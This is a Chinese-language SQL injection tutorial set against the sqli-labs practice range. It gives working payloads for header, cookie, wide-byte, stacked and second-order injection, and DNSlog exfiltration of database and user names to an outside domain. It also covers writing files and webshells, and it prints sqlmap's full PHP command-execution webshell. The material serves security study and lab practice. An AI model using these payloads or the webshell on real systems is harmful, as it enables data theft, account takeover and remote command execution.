UA是用户代理(User-Agent)
的缩写,里面含有客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。
一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示。此时就有可能存在UA 头注入,一般会把数据插入到某张表中所以可以用报错注入
。
构造的POC,获取数据库名:
1' and updatexml(1,concat(0x7e,database()),1) and '
由于不知道是多少个参数,所以前面的单引号是用来闭合前面的,后面的单引号是用来闭合后面的,这里不能使用#来对后面的参数进行省略。
后续获取其他数据的方法和上一节的联合注入大同小异。
报文中referer就是
你的浏览器需要告诉服务器你是从哪个地方访问服务器的(来源)
,大部分网站或者app都会写入数据库用来分析量从哪里来,以及统计广告投入的成本,一般会把数据插入到某张表中所以可以用报错注入
。
构造的POC,获取数据库名:
’ and updatexml(1,concat(0x7e,database()),1) and ’
由于不知道是多少个参数,所以前面的单引号是用来闭合前面的,后面的单引号是用来闭合后面的,这里不能使用 #
来对后面的参数进行省略。
后续获取其他数据的方法和上一节的联合注入大同小异。
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉
,这就影响了我们的测试进度,也许你也可以使用代理池。
我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找。
dns在解析的时候会留下记录。
简单来说,当dns服务器是我们自己的时,我们就可以通过查看日志来查询一些信息。
1、dns带外查询属于MySQL注入,在MySQL中有个系统属性
secure_file_priv特性,该属性值必须为空
(等于号后面没有任何内容)。
2、使用LOAD_FILE()函数
:LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。
语法为:load_file(file_name),其中file_name是文件的完整路径
3、所以需要root权限
,并且服务器要为Windows操作系统
。
将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。
先在DNSlog平台上随机生成一个本地IP的DNS域名:
29lrdw.dnslog.cn
利用注入语句获取数据库名,使用的POC:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+database()),'.29lrdw.dnslog.cn/qwe')))--+
获取当前用户名,使用的POC:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+ hex(user())),'.29lrdw.dnslog.cn/qwe')))--+
这样字就成功获得当前的用户名了。
如果我们要查询的用户名中存在特殊字符:如!@#$%^&
。最后在请求DNS服务器时变成:!@#$%^&*. 29lrdw.dnslog.cn。存在特殊字符的域名无法解析
。因此在DNS日志中也找不到我们查询的数据。因此需要编码后进行查询,例如上述的用户名是root@localhost,存在特殊字符@,这个是无法DNS服务器是无法解析的,这就需要hex编码
后查询出结果再解码。
在我们查询时,当不确定查询结果是否存在特殊字符时,最好先将其hex编码后再带入查询。
对get传递来的参数进行了过滤,但是忽略了cookie也可以传递参数。
cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie方式提交,而一般的注入我们是使用get或者post方式提交。
(get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。)
cookie注入:修改自身cookie , 后台获取到这个cookie后 , 会直接拿去数据库里面进行比较 , 比较的时候就有可能注入。
注意:该注入一般可以联合XSS攻击一起使用
在cookie后面的admin添加一个单引号出现报错,那么,这里就存在注入
Cookie: uname=admin' and updatexml(1,concat(0x7e,database()),1) #
注意上面的POC是使用#
来忽略后面的内容,而不是使用 - -
数据库使用GBK编码
的时候,会将两个字符合并成一个中文。特殊值字符如单引号都会被转义。如: ' -> \' (%27 -> %5c%27)
这时我们就可以在单引号( ' )前面
添加一个随机的GBK编码,例如:%df,该编码会把斜杠( \ )吃掉,从而把后面的单引号( ’ )解放出来,%df%27在GBK编码中会变成%df%5c%27
,这时候%df%5c会合并成一个汉字
,剩下的%27( ' )
就被独立解放出来了。
http:// 192.168.43.110:9006/Less-32/?id=-1%df%27 union select 1,database(),user()--+
这样子就把数据库名和用户名获取到了。
注:
这里是假设已经知道了该表只有3列的前提,具体前置过程可以参数前面的联合注入。
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?
因此这个想法也就造就了堆叠注入。
区别就在于union 或者union all执行的语句类型是有限的,联合注入用来执行查询语句
,而堆叠注入可以执行的是任意的语句
。
如下图构造POC:
http:// 192.168.43.110:9006/ /Less-38/?id=1'; insert into users(id,username,password)values(100,'kkkddd','kkkddd')--+
接着返回靶场查看数据库
这样子就把创建用户的MySql命令注入成功了。
输入的内容会被转换成字符串形式存储到数据库,从而会使得无法执行。那么我们就可以先把POC存储进数据库
,然后把存在数据里面的POC调取出来执行,从而达到注入的效果。
一般情况下,账户名是不允许输入 # @ \ ’ 等特殊符号的,但可以做一个尝试,假如真的尝试出来了,那就可以尝试进行二次注入了。
在知道某个账号名的存在,而想修改该账号对应的密码。例如我知道存在一个账号叫:admin
,然后我就创建一个账号叫:admin'#
,同时修改 admin’# 账号的密码,从而达到修改 admin 的密码。
这里利用admin账号
上面无论我在login_user后面添加一个单引号还是两个单引号,或者其他字符,都会发生报错,也就是说输入的内容会全部变换成字符串形式来进行存储、查询。
新账号名:admin'#
新账号密码:123456
登录成功。
尝试登录admin'#
账号,发现新改的密码:111111无法登录,还是得使用原来得旧密码123456。
尝试登录admin
账号,发现原来的密码:admin无法登录,密码变成了:111111。
这里是使用了下面的SQL语句:
UPDATE users SET PASSWORD=’111111’ where username='admin'#'
and password=’123456’;
这里不难看出,调用时#
后面的内容时全部忽略的,变成:
UPDATE users SET PASSWORD=’111111’ where username='admin'
原本时修改admin'#
账号,就变成修改admin
账号了。
secure_file_priv
=为空或者在网站的根目录下就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
高版本的MYSQL添加了一个新的特性secure_file_priv
,该选项限制了mysql导出文件的权限
1)secure_file_priv=
代表对文件读写没有限制
2)secure_file_priv=NULL
代表不能进行文件读写
3)secure_file_priv=d :/phpstudy /mysql/data
代表只能对该路径下文件进行读写
命令:
show global variables like '%secure%'
#查看mysql全局变量的配置
报错显示,遗留文件,漏洞报错,平台配置文件等
使用load_file()
读取文件
路径不能使用反斜杠(\)
。可以使用斜杠(/)
、双反斜杠(\\)
、0x,char
转换的字符
4.1、在靶机创建文件
在C:\phpstudy_pro\WWW\sqli-labs-master目录下建立一个文件名1.txt,内容是:i am 1.txt
4.2、构造POC读取文件
在靶场使用SQL注入读取文件,POC是:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,load_file('C:/phpstudy_pro/WWW/sqli-labs-master/1.txt')
,3–+
同理,该方法可以读取到任意的文件。一般实战中我们可以使用这种方法来读取网站的配置文件和日志文件。
注意:上面的路径不能使用反斜杠(\),只能使用斜杠(/)和双反斜杠(\\)。
使用函数 into outfile
(能写入多行,按格式输出)和 into Dumpfile
(只能写入一行,且没有脏数据)
outfile
后面本能接0x开头或者char转换以后的路径,只能是单引号路径
3.1、构造POC写入文件
现在要在C:\phpstudy_pro\WWW\sqli-labs-master目录下创建一个文件3.txt,并写入内容,POC是:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,‘helloword’,3 into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/3.txt'--+
注意:
假如写入的文件名已经存在,是会写入失败的。
3.2、尝试写入shell
构造的POC:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,''
,3 into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/4.php'--+
3.3、into outfile 和 into Dumpfile的区别
如上面例子只想留下单纯的php文本,而不想要其他脏文本,就可以使用into Dumpfile,并且把1、3等字符换成‘’(两个单引号的空字符)
绝对路径
堆叠注入
。root权限
show variables like ‘%general%’;
这里默认是关闭的。
set global general_log_file = ‘D:\phpstudy_pro\WWW\shell.php’;
–os-shell就是使用 udf 提权获取WebShell。也是通过 into oufile 向服务器写入两个文件,一个可以直接执行系统命令
,一个进行上传文件
此为sqlmap的一个命令
sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell
sqlmap 在指定的目录生成了两个文件(文件名是随机的,并不是固定的),这里就生成了如下两个文件:
tmpbeewq.php 用来执行系统命令
tmpuqvgw.php 用来上传文件
tmpbeewq.php的文件内容为:
$c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"$w
";?>
使用tmpuqvgw.php上传文件